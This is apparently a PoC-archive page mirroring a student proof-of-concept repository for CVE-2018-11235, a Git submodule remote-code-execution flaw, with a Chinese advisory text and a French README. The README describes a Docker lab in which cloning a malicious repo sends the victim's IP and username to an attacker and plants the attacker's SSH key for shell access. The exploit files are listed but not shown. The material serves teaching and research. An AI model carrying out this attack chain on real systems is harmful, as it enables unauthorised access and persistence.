Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-11235 PoC — Git 安全漏洞

Source
Associated Vulnerability
Title:Git 安全漏洞 (CVE-2018-11235)
Description:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git中存在安全漏洞,该漏洞源于在将子模块名称添加到$GIT_DIR/modules目录下时,程序没有正确的验证来自不可信.gitmodules文件的子模块名称。远程攻击者可借助特制的.gitmodules文件利用该漏洞执行任意代码。以下版本受到影响:Git 2.13.7之前版本,2.14.4之前的2.14.x版本,2.15.2之前的2.15.x版本,2.16.4之前的2.16.x版本,2.1
Description
Proof of Concept - RCE Exploitation : Git submodules' names vulnerability  - Ensimag November 2018
Readme
# CVE-2018-11235

## Getting started

Pour build les conteneurs dockers, utilisez :

```sh
make docker
```

(Les commandes make suivantes sont à lancer en parallèle sur différents terminaux depuis votre machine)

Pour démarrer le conteneur du serveur attaquant, utilisez :

``` sh
make run_server
```

pour démarrer le conteneur représentant la victime, utilisez :

``` sh
make run_client
```
Le conteneur va lancer le script client.py. Le script va transmettre son adresse Ip et son nom de utilisateur au pirate.

Suivez les instructions de la console des clients pour cloner le dépôt git malveillant.

``` sh
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
```

Vous constaterez que l'adresse IP et le nom d'utilisateur de la victime sont transmis au serveur.

Après le clone, vérifiez que la clé publique des attaquants est bien ajoutée aux authorized_keys du client.


Ensuite, vous pouvez ouvrir un shell sur le client depuis le serveur, grâce à la commande suivante (à executer sur votre machine):

```sh
make server_bash
```

`ssh <transmitted_username>@<transmitted_host>`

## Questions

Si vous avez quelques problèmes que ce soit pour executer ce Proof of Concept, veuillez créer
une issue sur ce dépôt: https://github.com/ygouzerh/CVE-2018-11235/issues , nous vous répondrons le plus
rapidement possible.

File Snapshot

[4.0K] /data/pocs/1e4462c75e0da7f4f9d69425de50ce6dedfb563f ├── [4.0K] build ├── [ 865] client.py ├── [4.0K] dist ├── [ 694] Dockerfile.client ├── [ 814] Dockerfile.server ├── [4.0K] key ├── [ 358] Makefile ├── [4.0K] poc │   ├── [ 136] attack.sh │   ├── [1.1K] build.sh │   └── [6.2K] surprise.txt ├── [246K] rapport.pdf ├── [1.3K] README.md ├── [ 253] requirements.txt └── [ 652] server.py 4 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.